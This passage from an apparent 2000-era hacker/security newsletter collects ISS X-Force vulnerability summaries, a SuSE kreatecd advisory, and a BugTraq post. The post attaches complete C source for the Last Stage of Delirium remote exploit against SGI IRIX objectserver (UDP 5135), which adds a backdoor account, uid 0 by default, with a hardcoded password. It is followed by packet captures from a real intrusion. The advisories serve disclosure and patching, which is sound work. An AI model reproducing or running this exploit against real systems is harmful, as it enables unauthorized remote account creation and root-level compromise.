BugTraq mailing list: "Caldera OpenLinux 2.3 rpm_query CGI Vulnerability" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.4.21.0003041204220.6797-100000@juggernaut.el8.org
_____
Date Reported: 3/2/00
Vulnerability: thebat-mua-attach
Platforms Affected: The Bat!
Risk Factor: Medium
Attack Type: Network Based
The Bat! is a mail agent for Windows developed by Rit Research Labs. One
of the program's features is that it saves attachments from incoming mail
in a specified folder on the system, and adds the file's path to the
incoming message as a pseudo-header called X-BAT-FILES. If a message with
an attachment is forwarded to someone else, the pseudo-header line
remains. This allows the recipient to see the sender's default location
for all saved email attachments.
Reference:
BugTraq Mailing List: "Rit Research Labs 'The Bat!' X-BAT-FILES
Vulnerabilities" at:
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=200003021443.RAA31070@adm.sci-nnov.ru
_____
Date Reported: 3/2/00
Vulnerability: irix-infosrch-fname
Platforms Affected: IRIX 6.5
Risk Factor: High
Attack Type: Network/Host Based
InfoSearch is a tool distributed by SGI that converts man pages, release
notes, and other documents into HTML format for reading on the Internet.
It contains a vulnerability in the method it uses to parse input for the
fname variable that would allow a remote attacker to execute arbitrary
commands on the web server.
Reference:
Bugtraq Mailing List: "infosrch.cgi vulnerability (IRIX 6.5)" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.4.10.10003021059360.21162-100000@inetarena.com
_____
Date Reported: 3/2/00
Vulnerability: linux-dosemu-config
Platforms Affected: Corel Linux 1.0
Risk Factor: High
Attack Type: Host Based
Corel Linux 1.0 contains a vulnerability in the configuration of the
dosemu package. Dosemu is a DOS emulator that allows DOS programs to run
on Linux. A local user can use the system.com binary to execute commands
as root.
Reference:
Bugtraq Mailing List: "Corel Linux 1.0 dosemu default configuration: Local
root vuln" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200003020436.PAA20168@jawa.chilli.net.au
_____
Date Reported: 3-01-2000
Vulnerability: coldfusion-reveal-pathname
Platforms Affected: ColdFusion 4.01
Risk Factor: Low
Attack Type: Network Based
ColdFusion 4.01 contains a vulnerability that can reveal path names to cfm
pages. When a remote user makes an HTTP request to a cfm page, the server
will return an error message that reveals the full path name to the file.
Reference:
NTBUGTRAQ Mailing List: "ColdFusions application.cfm shows full path" at:
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0003&L=ntbugtraq&F=&S=&P=435
_____
Date Reported: 3-01-2000
Vulnerability: netscape-enterprise-command-bo
Platforms Affected: Netscape Enterprise Server (3.6)
Risk Factor: High
Attack Type: Network Based
Netscape Enterprise Server 3.6 web server for Windows NT 4.0 contains a
buffer overflow in commands issued to the server. If a remote user issues
a command followed by a large quantity of data, the server will crash. It
is possible for the user to then execute arbitrary code.
References:
S.A.F.E.R. Security Bulletin SAFER 000229.EXP.1.3: "Buffer Overflow in
Netscape Enterprise Server" at:
http://www.safermag.com/advisories/0006.html
BUGTRAQ Mailing List: "[SAFER 000229.EXP.1.3] Remote buffer overflow in
Netscape Enterprise Server 3.6 SP2" at:
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-02-29&msg=38BC065A.E6AE7002@relaygroup.com
_____
Date Reported: 3/1/00
Vulnerability: nmh-execute-code
Platforms Affected: Debian Linux 2.1
Risk Factor: High
Attack Type: Network Based
The nmh package does not properly check incoming mail message headers. A
remote attacker could send specially-crafted MIME message headers that
would cause mhshow to execute arbitrary code.
Reference:
Debian Security Advisory: "New version of nmh released" at:
http://www.debian.org/Lists-Archives/debian-security-announce-00/msg00005.html
_____
Date Reported: 3/1/00
Vulnerability: htdig-remote-read
Platforms Affected: Unix running htdig 3.1.5
Risk Factor: Low
Attack Type: Network Based
The ht://dig program is a web indexing and searching system for intranets
and small domains. Due to improper validation of form input, a remote
attacker could pass a variable to the htsearch CGI that would allow the
attacker to read any file on the machine that is accessible by the htdig
user.
Reference:
Debian Security Advisory: "New version of htdig released" at:
http://www.debian.org/Lists-Archives/debian-security-announce-00/msg00004.html
_____
Date Reported: 3/1/00
Vulnerability: ie-html-shortcut
Platforms Affected: Microsoft Internet Explorer (5.0, 5.0.1)
Risk Factor: High
Attack Type: Network/Host Based
Microsoft Internet Explorer 5 uses window.showHelp() to open HTML help
files (.chm). If these files contain a shortcut to an executable, it will
be run with the privileges of the current user. An attacker could create a
.chm file with a link to an executable and cause it to execute on the
victim's machine.
Reference:
Bugtraq Mailing List: "IE 5.x allows executing arbitrary programs using
.chm files" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=38BD37F6.C9B3F8B@nat.bg
_____
Risk Factor Key:
High Any vulnerability that provides an attacker with immediate
access into a machine, gains superuser access, or bypasses
a firewall. Example: A vulnerable Sendmail 8.6.5 version
that allows an intruder to execute commands on mail
server.
Medium Any vulnerability that provides information that has a
high potential of giving system access to an intruder.
Example: A misconfigured TFTP or vulnerable NIS server
that allows an intruder to get the password file that
could contain an account with a guessable password.
Low Any vulnerability that provides information that
potentially could lead to a compromise. Example: A
finger that allows an intruder to find out who is online
and potential accounts to attempt to crack passwords
via brute force methods.
_____
Permission is hereby granted for the redistribution of this Alert Summary
electronically. It is not to be edited in any way without express
consent of the X-Force. If you wish to reprint the whole or any part of
this Alert Summary in any other medium excluding electronic medium,
please e-mail xforce@iss.net for permission.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties with regard to this information. In no event shall the
author be liable for any damages whatsoever arising out of or in
connection with the use or spread of this information. Any use of this
information is at the user's own risk.
X-Force PGP Key available at: http://xforce.iss.net/sensitive.php3 as
well as on MIT's PGP key server and PGP.com's key server.
Please send suggestions, updates, and comments to:
X-Force <xforce@iss.net> of Internet Security Systems, Inc.
About Internet Security Systems
Internet Security Systems (ISS) is the leading global provider of security
management solutions for the Internet. By providing industry-leading
SAFEsuite* security software, ePatrol* remote managed security services,
and strategic consulting and education offerings, ISS is a trusted
security provider to its customers and partners, protecting digital assets
and ensuring safe and uninterrupted e-business. ISS' security management
solutions protect more than 5,500 customers worldwide including 21 of the
25 largest U.S. commercial banks, 10 of the largest telecommunications
companies and over 35 government agencies. Founded in 1994, ISS is
headquartered in Atlanta, GA, with additional offices throughout North
America and international operations in Asia, Australia, Europe, Latin
America and the Middle East. For more information, visit the Internet
Security Systems web site at www.iss.net <http://www.iss.net> or call
888-901-7477.
Copyright (c) 2000 by Internet Security Systems, Inc.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv
iQCVAwUBOOjlnzRfJiV99eG9AQHSOgQAj9D2ufzmwt8RyBRDZLzDCtdfTcG9KiaZ
AbQfghGaav5IlYrSUEj2GFHj1KeLb2o8OCCnzVo5T1YFoIKC3L6ZxQ9q0Gsi2Pfv
KXYGtYmNcOzQ5WIjUuBm1T2/ZXcL3cPYkfcMzyIKp0iddhx7noxuHJOffP1QTzm6
/hbYgL+fum8=
=bxur
-----END PGP SIGNATURE-----
@HWA
255.0 PSS: suse kreatecd root compromise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-----BEGIN PGP SIGNED MESSAGE-----
______________________________________________________________________________
SuSE Security Announcement
Package: kreatecd < 0.3.8b
Date: Wed, 5 Apr 2000 20:00:12 GMT
Affected SuSE versions: 6.4
Vulnerability Type: local root compromise
SuSE default package: no
Other affected systems: all unix systems using kreatecd
______________________________________________________________________________
A security hole was discovered in the package mentioned above.
Please update as soon as possible or disable the service if you are using
this software on your SuSE Linux installation(s).
Other Linux distributions or operating systems might be affected as
well, please contact your vendor for information about this issue.
Please note that we provide this information on an "as-is" basis only.
There is no warranty whatsoever and no liability for any direct, indirect or
incidental damage arising from this information or the installation of
the update package.
_____________________________________________________________________________
1. Problem Description
kreatecd is a KDE tool used to burn cd-roms.
An exploitable buffer overflow was found in this tool.
2. Impact
Local users may gain root privilige.
3. Solution
Update the package from our FTP server, or remove the suid bit from this
tool. ("chmod u-s /opt/kde/bin/kreatecd")
______________________________________________________________________________
Please verify these md5 checksums of the updates before installing:
742ed57b8bfb022d4e3755e417612272 ftp://ftp.suse.com/pub/suse/axp/update/6.4/kpa1/kreatecd-0.3.8b-0.alpha.rpm
09cbe9a08cf2b0d5d5d0b1963c3edbcd ftp://ftp.suse.com/pub/suse/i386/update/6.4/kpa1/kreatecd-0.3.8b-0.i386.rpm
e59c71fa6ae5cf59af9aa1bdce89b015 ftp://ftp.suse.com/pub/suse/ppc/update/6.4/kpa1/kreatecd-0.3.8b-0.ppc.rpm
______________________________________________________________________________
You can find updates on our ftp-Server:
ftp://ftp.suse.com/pub/suse/i386/update for Intel processors
ftp://ftp.suse.com/pub/suse/axp/update for Alpha processors
or try the following web pages for a list of mirrors:
http://www.suse.de/ftp.html
http://www.suse.com/ftp_new.html
Our webpage for patches:
http://www.suse.de/patches/index.html
Our webpage for security announcements:
http://www.suse.de/security
If you want to report vulnerabilities, please contact
security@suse.de
______________________________________________________________________________
SuSE has got two free security mailing list services to which any
interested party may subscribe:
suse-security@suse.com - moderated and for general/linux/SuSE
security discussions. All SuSE security
announcements are sent to this list.
suse-security-announce@suse.com - SuSE's announce-only mailing list.
Only SuSE's security annoucements are sent
to this list.
To subscribe to the list, send a message to:
<suse-security-subscribe@suse.com>
To remove your address from the list, send a message to:
<suse-security-unsubscribe@suse.com>
Send mail to the following for info and FAQ for this list:
<suse-security-info@suse.com>
<suse-security-faq@suse.com>
_____________________________________________________________________________
This information is provided freely to everyone interested and may
be redistributed provided that it is not altered in any way.
Type Bits/KeyID Date User ID
pub 2048/3D25D3D9 1999/03/06 SuSE Security Team <security@suse.de>
- ------BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
mQENAzbhLQQAAAEIAKAkXHe0lWRBXLpn38hMHy03F0I4Sszmoc8aaKJrhfhyMlOA
BqvklPLE2f9UrI4Xc860gH79ZREwAgPt0pi6+SleNFLNcNFAuuHMLQOOsaMFatbz
JR9i4m/lf6q929YROu5zB48rBAlcfTm+IBbijaEdnqpwGib45wE/Cfy6FAttBHQh
1Kp+r/jPbf1mYAvljUfHKuvbg8t2EIQz/5yGp+n5trn9pElfQO2cRBq8LFpf1l+U
P7EKjFmlOq+Gs/fF98/dP3DfniSd78LQPq5vp8RL8nr/o2i7jkAQ33m4f1wOBWd+
cZovrKXYlXiR+Bf7m2hpZo+/sAzhd7LmAD0l09kABRG0JVN1U0UgU2VjdXJpdHkg
VGVhbSA8c2VjdXJpdHlAc3VzZS5kZT6JARUDBRA24S1H5Fiyh7HKPEUBAVcOB/9b
yHYji1/+4Xc2GhvXK0FSJN0MGgeXgW47yxDL7gmR4mNgjlIOUHZj0PEpVjWepOJ7
tQS3L9oP6cpj1Fj/XxuLbkp5VCQ61hpt54coQAvYrnT9rtWEGN+xmwejT1WmYmDJ
xG+EGBXKr+XP69oIUl1E2JO3rXeklulgjqRKos4cdXKgyjWZ7CP9V9daRXDtje63
Om8gwSdU/nCvhdRIWp/Vwbf7Ia8iZr9OJ5YuQl0DBG4qmGDDrvImgPAFkYFzwlqo
choXFQ9y0YVCV41DnR+GYhwl2qBd81T8aXhihEGPIgaw3g8gd8B5o6mPVgl+nJqI
BkEYGBusiag2pS6qwznZiQEVAwUQNuEtBHey5gA9JdPZAQFtOAf+KVh939b0J94u
v/kpg4xs1LthlhquhbHcKNoVTNspugiC3qMPyvSX4XcBr2PC0cVkS4Z9PY9iCfT+
x9WM96g39dAF+le2CCx7XISk9XXJ4ApEy5g4AuK7NYgAJd39PPbERgWnxjxir9g0
Ix30dS30bW39D+3NPU5Ho9TD/B7UDFvYT5AWHl3MGwo3a1RhTs6sfgL7yQ3U+mvq
MkTExZb5mfN1FeaYKMopoI4VpzNVeGxQWIz67VjJHVyUlF20ekOz4kWVgsxkc8G2
saqZd6yv2EwqYTi8BDAduweP33KrQc4KDDommQNDOXxaKOeCoESIdM4p7Esdjq1o
L0oixF12Cg==
=pIeS
- ------END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
iQEVAwUBOOucPney5gA9JdPZAQH4Tgf/fH0SmQlfvdhowia3LXKFeoTOA5EMn027
ldofK35EZLui4KpBwyxBvdGZXG1fBpCaO3SackdNxD1PzfTJk7ykjch9vmaD2Zq8
lbGoHqF1y823GzSvPu5VXaY2M3W8HbxWFGnc/Yh/v7ST6x0FVJAoFMImVkdWS7gZ
TaEtyBeZBSTvcV/fzA7m3tFqoaCbCMWJTKBj9ENM4u8wM8GrCT+JQa6r/BzBb3VF
QzAs6/dA/3PPc5k3qd7Zaf/9z6K6OMJaMoIr21w67D9M2XYb2luUlyjyrd1H3MGU
iodDDcVYRUsGNBlDjTI42XdFXpgNWH6QtIbmjBsT6x/MdkeOTDlpMg==
=2H9o
-----END PGP SIGNATURE-----
--
To unsubscribe, e-mail: suse-security-announce-unsubscribe@suse.com
For additional commands, e-mail: suse-security-announce-help@suse.com
@HWA
256.0 PSS: irix object server remote root exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
At 08:52 AM 3/29/2000 -0500, Howard wrote:
>Since the patches are now officially released, I feel I can finally
>release the details of the SGI objectserver vulnerability. This
>vulnerability was initailly reported to CERT and SGI Security on
>October 6, 1997. A beta version of patch 2849 was provided in
>February 1998.
>
Hi. As a legitimate function of my work I routinely archive and catalog
vulnerability information and exploit code. In the interest of
full-disclosure and in possibly helping system administrators evaluate
the security of their SGI boxen, I am attaching the remote exploit for
Irix objectserver (udp 5135).
There are big problems with the US government right now - if you are
doing security work (let alone cracking!) be advised that things are
getting seriously fucked. See the "L0phtcrack as a burglary tool"
article? See all these kids getting PRISON sentences for typing? The
government isn't playing by sane rules. Be prepared. Be awake!
Marcy
/* Copyright (c) July 1997 Last Stage of Delirium */
/* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF */
/* Last Stage of Delirium */
/* */
/* The contents of this file may be disclosed to third */
/* parties, copied and duplicated in any form, in whole */
/* or in part, without the prior written consent of LSD. */
/* SGI objectserver "account" exploit
*/
/* Remotely adds account to the IRIX system.
*/
/* Tested on IRIX 5.2, 5.3, 6.0.1, 6.1 and even 6.2,
*/
/* which was supposed to be free from this bug (SGI 19960101-01-PX).
*/
/* The vulnerability "was corrected" on 6.2 systems but
*/
/* SGI guys fucked up the job and it still can be exploited.
*/
/* The same considers patched 5.x,6.0.1 and 6.1 systems
*/
/* where SGI released patches DONT work.
*/
/* The only difference is that root account creation is blocked.
*/
/*
*/
/* usage: ob_account ipaddr [-u username] [-i userid] [-p]
*/
/* -i specify userid (other than 0)
*/
/* -u change the default added username
*/
/* -p probe if there's the objectserver running
*/
/*
*/
/* default account added : lsd
*/
/* default password : m4c10r4!
*/
/* default user home directory : /tmp/.new
*/
/* default userid : 0
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/uio.h>
#include <errno.h>
#include <stdio.h>
#define E if(errno) perror("");
struct iovec iov[2];
struct msghdr msg;
char buf1[1024],buf2[1024];
int sck;
unsigned long adr;
void show_msg(){
char *p,*p1;
int i,j,c,d;
c=0;
printf("%04x ",iov[0].iov_len);
p=(char*)iov[0].iov_base;
for(i=0;i<iov[0].iov_len;i++){
c++;
if(c==17){
printf(" ");
p1=p;p1=p1-16;
for(j=0;j<16;j++){
if(isprint(*p1)) printf("%c",*p1);
else printf(".");
p1++;
}
c=1;
printf("\n ");
}
printf("%02x ",(unsigned char)*p++);
}
printf(" ");
p1=p;p1=p1-c;
if(c>1){
for(i=0;i<(16-c);i++) printf(" ");
for(i=0;i<c;i++){
if(isprint(*p1)) printf("%c",*p1);
else printf(".");
p1++;
}
}
printf("\n");
if(msg.msg_iovlen!=2) return;
c=0;
p=(char*)iov[0].iov_base;
d=p[0x0a]*0x100+p[0x0b];
p=(char*)iov[1].iov_base;
printf("%04x ",d);
for(i=0;i<d;i++){
c++;
if(c==17){
printf(" ");
p1=p;p1=p1-16;
for(j=0;j<16;j++){
if(isprint(*p1)) printf("%c",*p1);
else printf(".");
p1++;
}
c=1;
printf("\n ");
}
printf("%02x ",(unsigned char)*p++);
}
printf(" ");
p1=p;p1=p1-c;
if(c>1){
for(i=0;i<(16-c);i++) printf(" ");
for(i=0;i<c;i++){
if(isprint(*p1)) printf("%c",*p1);
else printf(".");
p1++;
}
}
printf("\n");
fflush(stdout);
}
char numer_one[0x10]={
0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
0x00,0x00,0x00,0x24,0x00,0x00,0x00,0x00
};
char numer_two[0x24]={
0x21,0x03,0x00,0x43,0x00,0x0a,0x00,0x0a,
0x01,0x01,0x3b,0x01,0x6e,0x00,0x00,0x80,
0x43,0x01,0x01,0x18,0x0b,0x01,0x01,0x3b,
0x01,0x6e,0x01,0x02,0x01,0x03,0x00,0x01,
0x01,0x07,0x01,0x01
};
char dodaj_one[0x10]={
0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
0x00,0x00,0x01,0x2a,0x00,0x00,0x00,0x00
};
char dodaj_two[1024]={
0x1c,0x03,0x00,0x43,0x02,0x01,0x1d,0x0a,
0x01,0x01,0x3b,0x01,0x78
};
char dodaj_three[27]={
0x01,0x02,0x0a,0x01,0x01,0x3b,
0x01,0x78,0x00,0x00,0x80,0x43,0x01,0x10,
0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
0x01,0x01,0x09,0x43,0x01
};
char dodaj_four[200]={
0x17,0x0b,0x01,0x01,0x3b,0x01,0x02,
0x01,0x01,0x01,0x09,0x43,0x01,0x03,0x4c,
0x73,0x44,0x17,0x0b,0x01,0x01,0x3b,0x01,
0x6e,0x01,0x06,0x01,0x09,0x43,0x00,0x17,
0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,0x07,
0x01,0x09,0x43,0x00,0x17,0x0b,0x01,0x01,
0x3b,0x01,0x02,0x01,0x03,0x01,0x09,0x43,
0x00,0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,
0x01,0x09,0x01,0x09,0x43,0x00,0x17,0x0b,
0x01,0x01,0x3b,0x01,0x6e,0x01,0x0d,0x01,
0x09,0x43,0x00,0x17,0x0b,0x01,0x01,0x3b,
0x01,0x6e,0x01,0x10,0x01,0x09,0x43,0x00,
0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
0x0a,0x01,0x09,0x43,0x00,0x17,0x0b,0x01,
0x01,0x3b,0x01,0x6e,0x01,0x0e,0x01,0x03,
0x01,0x09,0x17,0x0b,0x01,0x01,0x3b,0x01,
0x6e,0x01,0x04,0x01,0x09,0x43,0x01,0x0d,
0x61,0x6b,0x46,0x4a,0x64,0x78,0x65,0x6e,
0x4b,0x6e,0x79,0x53,0x2e,0x17,0x0b,0x01,
0x01,0x3b,0x01,0x6e,0x01,0x11,0x01,0x09,
0x43,0x01,0x09,0x2f,0x74,0x6d,0x70,0x2f,
0x2e,0x6e,0x65,0x77,0x17,0x0b,0x01,0x01,
0x3b,0x01,0x6e,0x01,0x12,0x01,0x09,0x43,
0x01,0x04,0x72,0x6f,0x6f,0x74,0x17,0x0b,
0x01,0x01,0x3b,0x01,0x6e,0x01,0x02,0x01,
0x03
};
char dodaj_five[39]={
0x17,0x0b,0x01,0x01,0x3b,0x01,
0x6e,0x01,0x13,0x01,0x09,0x43,0x01,0x08,
0x2f,0x62,0x69,0x6e,0x2f,0x63,0x73,0x68,
0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
0x0f,0x01,0x09,0x43,0x01,0x03,'L','S','D'
};
char fake_adrs[0x10]={
0x00,0x02,0x14,0x0f,0xff,0xff,0xff,0xff,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
char *get_sysinfo(){
int i=0,j,len;
iov[0].iov_base=numer_one;
iov[0].iov_len=0x10;
iov[1].iov_base=numer_two;
iov[1].iov_len=0x24;
msg.msg_name=(caddr_t)fake_adrs;
msg.msg_namelen=0x10;
msg.msg_iov=iov;
msg.msg_iovlen=2;
msg.msg_accrights=(caddr_t)0;
msg.msg_accrightslen=0;
printf("SM: --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
printf("\n");
iov[0].iov_base=buf1;
iov[1].iov_base=buf2;
iov[1].iov_len=0x200;
msg.msg_iovlen=2;
printf("RM: --[0x%04x bytes]--\n",len=recvmsg(sck,&msg,0));
show_msg();
printf("\n");
while(i<len-0x16)
if(!memcmp("\x0a\x01\x01\x3b\x01\x78",&buf2[i],6)){
printf("remote system ID: ");
for(j=0;j<buf2[i+6];j++) printf("%02x ",buf2[i+7+j]);
printf("\n");
return(&buf2[i+6]);
}else i++;
return(0);
}
void new_account(int len){
iov[0].iov_base=dodaj_one;
iov[0].iov_len=0x10;
iov[1].iov_base=dodaj_two;
iov[1].iov_len=len;
msg.msg_name=(caddr_t)fake_adrs;
msg.msg_namelen=0x10;
msg.msg_iov=iov;
msg.msg_iovlen=2;
msg.msg_accrights=(caddr_t)0;
msg.msg_accrightslen=0;
printf("SM: --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
printf("\n");
iov[0].iov_base=buf1;
iov[1].iov_base=buf2;
iov[1].iov_len=0x200;
msg.msg_iovlen=2;
printf("RM: --[0x%04x bytes]--\n",recvmsg(sck,&msg,0)); show_msg();
printf("\n");
}
void info(char *text){
printf("SGI objectserver \"account\" exploit by LSD\n");
printf("usage: %s ipaddr [-u username] [-i userid] [-p]\n",text);
}
main(int argc,char **argv){
int c,user,version,probe;
unsigned int offset,gr_offset,userid;
char *sys_info;
char username[20];
extern char *optarg;
extern int optind;
if(argc<2) {info(argv[0]);exit(0);}
optind=2;
offset=40;
user=version=probe=0;
while((c=getopt(argc,argv,"u:i:p"))!=-1)
switch(c){
case 'u': strcpy(username,optarg);
user=1;
break;
case 'i': version=62;
userid=atoi(optarg);
break;
case 'p': probe=1;
break;
case '?':
default : info(argv[0]);
exit(1);
}
sck=socket(AF_INET,SOCK_DGRAM,0);
adr=inet_addr(argv[1]);
memcpy(&fake_adrs[4],&adr,4);
if(!(sys_info=get_sysinfo())){
printf("error: can't get system ID for %s.\n",argv[1]);
exit(1);
}
if(!probe){
memcpy(&dodaj_two[0x0d],sys_info,sys_info[0]+1);
memcpy(&dodaj_two[0x0d+sys_info[0]+1],&dodaj_three[0],27);
offset+=sys_info[0]+1;
if(!user) strcpy(username,"lsd");
dodaj_two[offset++]=strlen(username);
strcpy(&dodaj_two[offset],username);offset+=strlen(username);
memcpy(&dodaj_two[offset],&dodaj_four[0],200);
offset+=200;
gr_offset=offset-15;
if(version){
dodaj_two[gr_offset++]='u';
dodaj_two[gr_offset++]='s';
dodaj_two[gr_offset++]='e';
dodaj_two[gr_offset++]='r';
dodaj_two[offset++]=0x02;
dodaj_two[offset++]=userid>>8;
dodaj_two[offset++]=userid&0xff;
}
else dodaj_two[offset++]=0x00;
memcpy(&dodaj_two[offset],&dodaj_five[0],39);
offset+=39;
dodaj_one[10]=offset>>8;
dodaj_one[11]=offset&0xff;
new_account(offset);
}
}
/* end g23 exploit post */
__________________________________________________
Do You Yahoo!?
Talk to your friends online with Yahoo! Messenger.
http://im.yahoo.com
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: "Howard M. Kash III" <hmkash@ARL.MIL>
Subject: Objectserver vulnerability
X-To: BUGTRAQ@securityfocus.com
Since the patches are now officially released, I feel I can finally
release the details of the SGI objectserver vulnerability. This
vulnerability was initailly reported to CERT and SGI Security on
October 6, 1997. A beta version of patch 2849 was provided in
February 1998.
Howard
----- Forwarded message # 1:
Date: Mon, 6 Oct 97 7:09:51 EDT
From: "Howard M. Kash III"
To: cert@cert.org, security-alert@sgi.com
Subject: URGENT - new SGI vulnerability
[Internal error while calling pgp, raw data follows]
-----BEGIN PGP SIGNED MESSAGE-----
URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT
SGI objectserver vulnerabilty allows remote users to create accounts.
Yesterday two of our hosts were compromised by an (as far as I could
determine) unknown, unpatched bug in SGI's objectserver. The attack
consisted of sending UDP packets to port 5135 (see below). The
result was a non-root account being added to the system. The two
compromised hosts were running IRIX 6.2, but the vulnerability may
affect other versions of IRIX. The vulnerability does not appear to
give root access directly, as the attackers used other IRIX
vulnerabilities to gain root access after logging into the new
account.
Attached are the UDP packets exchanged between the attacking host
(aaa.aaa.aaa.aaa) and the target host (ttt.ttt.ttt.ttt). IP
addresses have been masked to protect the guilty - I mean innocent
until proven guilty. The result of this sequence of packets is the
following line added to /etc/passwd:
gueust:x:5002:20:LsD:/tmp/.new:/bin/csh
An entry must also be added to /etc/shadow since the attacker then
logs into the new account with a password.
As a temporary measure we have blocked all traffic to port 5135 at
our gateway.
Howard Kash
U.S. Army Research Lab
- ------------------------------------------------------------------------
TCP and UDP headers have been separated out. I've decoded some of the
packet contents into its ascii equivalent below the line.
16:52:00.631310 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 52
4500 0050 7d95 0000 2a11 bfb5 aaaa aaaa
tttt tttt
112a 140f 003c 6516
0001 0000
0001 0000 0000 0024 0000 0000 2103 0043
000a 000a 0101 3b01 6e00 0080 4301 0118
0b01 013b 016e 0102 0103 0001 0107 0101
16:52:00.638455 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 95
4500 007b 0644 0000 3a11 26dc tttt tttt
aaaa aaaa
140f 112a 0067 0d37
0001 0186
0001 0000 0000 004f 0000 0000 2903 0043
000a 0080 4300 8043 0105 0a01 013b 0178
0469 0a79 9a01 330a 0101 3b01 7804 690a
799a 0138 0a01 013b 0178 0469 0a79 9a01
020a 0101 3b01 7804 690a 799a 0103 0a01
013b 0178 0469 0a79 9a01 04
16:52:00.794985 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 312
4500 0154 7da3 0000 2a11 bea3 aaaa aaaa
tttt tttt
112a 140f 0140 a1b2
0001 0000
0001 0000 0000 0128 0000 0000 1c03 0043
0201 1d0a 0101 3b01 7804 690a 799a 0102
0a01 013b 0178 0000 8043 0110 170b 0101
3b01 6e01 0101 0943 0106 6775 6575 7374
g u e u s t
170b 0101 3b01 0201 0101 0943 0103 4c73
L s
4417 0b01 013b 016e 0106 0109 4300 170b
D
0101 3b01 6e01 0701 0943 0017 0b01 013b
0102 0103 0109 4300 170b 0101 3b01 6e01
0901 0943 0017 0b01 013b 016e 010d 0109
4300 170b 0101 3b01 6e01 1001 0943 0017
0b01 013b 016e 010a 0109 4300 170b 0101
3b01 6e01 0e01 0301 0917 0b01 013b 016e
0104 0109 4301 0d61 6b46 4a64 7865 6e4b
6e79 532e 170b 0101 3b01 6e01 1101 0943
0109 2f74 6d70 2f2e 6e65 7717 0b01 013b
/ t m p / . n e w
016e 0112 0109 4301 0470 6f6f 7417 0b01
013b 016e 0102 0103 0017 0b01 013b 016e
0113 0109 4301 082f 6269 6e2f 6373 6817
/ b i n / c s h
0b01 013b 016e 010f 0109 4301 074c 7344
2f43 5444
16:52:00.921356 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 41
4500 0045 0646 0000 3a11 2710 tttt tttt
aaaa aaaa
140f 112a 0031 0ef5
0001 0187
0001 0000 0000 0019 0000 0000 2503 0043
0201 1d0a 0080 4300 0a01 013b 0178 0469
0a79 9a01 39
16:53:33.226155 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 52
4500 0050 8f33 0000 2a11 ae17 aaaa aaaa
tttt tttt
112f 140f 003c 6511
0001 0000
0001 0000 0000 0024 0000 0000 2103 0043
000a 000a 0101 3b01 6e00 0080 4301 0118
0b01 013b 016e 0102 0103 0001 0107 0101
16:53:33.232248 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 108
4500 0088 0669 0000 3a11 26aa tttt tttt
aaaa aaaa
140f 112f 0074 3f4f
0001 0188
0001 0000 0000 005c 0000 0000 2903 0043
000a 0080 4300 8043 0106 0a01 013b 0178
0469 0a79 9a01 330a 0101 3b01 7804 690a
799a 0138 0a01 013b 0178 0469 0a79 9a01
390a 0101 3b01 7804 690a 799a 0102 0a01
013b 0178 0469 0a79 9a01 030a 0101 3b01
7804 690a 799a 0104
16:53:33.420972 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 314
4500 0156 8f3e 0000 2a11 ad06 aaaa aaaa
tttt tttt
112f 140f 0142 1399
0001 0000
0001 0000 0000 012a 0000 0000 1c03 0043
0201 1d0a 0101 3b01 7804 690a 799a 0102
0a01 013b 0178 0000 8043 0110 170b 0101
3b01 6e01 0101 0943 0106 6775 6575 7374
170b 0101 3b01 0201 0101 0943 0103 4c73
4417 0b01 013b 016e 0106 0109 4300 170b
0101 3b01 6e01 0701 0943 0017 0b01 013b
0102 0103 0109 4300 170b 0101 3b01 6e01
0901 0943 0017 0b01 013b 016e 010d 0109
4300 170b 0101 3b01 6e01 1001 0943 0017
0b01 013b 016e 010a 0109 4300 170b 0101
3b01 6e01 0e01 0301 0917 0b01 013b 016e
0104 0109 4301 0d61 6b46 4a64 7865 6e4b
6e79 532e 170b 0101 3b01 6e01 1101 0943
0109 2f74 6d70 2f2e 6e65 7717 0b01 013b
016e 0112 0109 4301 0475 7365 7217 0b01
013b 016e 0102 0103 0213 8a17 0b01 013b
016e 0113 0109 4301 082f 6269 6e2f 6373
6817 0b01 013b 016e 010f 0109 4301 074c
7344 2f43 5444
16:53:33.580619 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 41
